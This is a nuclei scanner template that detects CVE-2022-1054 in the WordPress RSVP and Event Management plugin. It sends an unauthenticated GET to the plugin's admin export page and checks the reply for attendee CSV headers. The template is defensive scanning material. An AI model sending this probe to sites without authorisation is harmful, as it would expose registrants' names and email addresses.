nuclei-templates/cves/2022/CVE-2022-1054.yaml


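# Detection template for CVE-2022-1054: the RSVP and Event Management
# WordPress plugin (before 2.7.8) serves its entry export without any
# authorization check. The probe is a single unauthenticated GET.
id: CVE-2022-1054

info:
  name: WordPress RSVP and Event Management <2.7.8 - Missing Authorization
  author: Akincibor
  severity: medium
  description: >-
    WordPress RSVP and Event Management plugin before 2.7.8 is susceptible to
    missing authorization. The plugin does not have any authorization checks
    when exporting its entries, and the export function is hooked to the init
    action. An attacker can potentially retrieve sensitive information such as
    first name, last name, and email address of users registered for events.
  # The fixed version is taken from the "<2.7.8" bound in the name above.
  remediation: Update the RSVP and Event Management plugin to version 2.7.8 or later.
  reference:
    - https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d
  classification:
    # PR:N / C:L: no privileges needed, limited confidentiality impact.
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-1054
    cwe-id: CWE-862
  tags: wordpress,cve,cve2022,wpscan,wp,wp-plugin

requests:
  - method: GET
    path:
      # Sent with no session cookie; the finding is that the export still answers.
      - '{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export'

    # Every matcher below has to pass before a finding is reported.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          # Both strings must be present. The double-quoted "First Name" looks
          # like a CSV header cell of the export (confirm against a real export).
          - 'RSVP Status'
          - '"First Name"'
        condition: and

      # Presumably a patched or absent plugin sends this request to the login
      # page instead of answering 200 (verify on a fixed install).
      - type: status
        status:
          - 200

# A positive match means the response body contains attendee names and e-mail
# addresses, so stored scan responses hold personal data.
# Enhanced by md on 2023/04/06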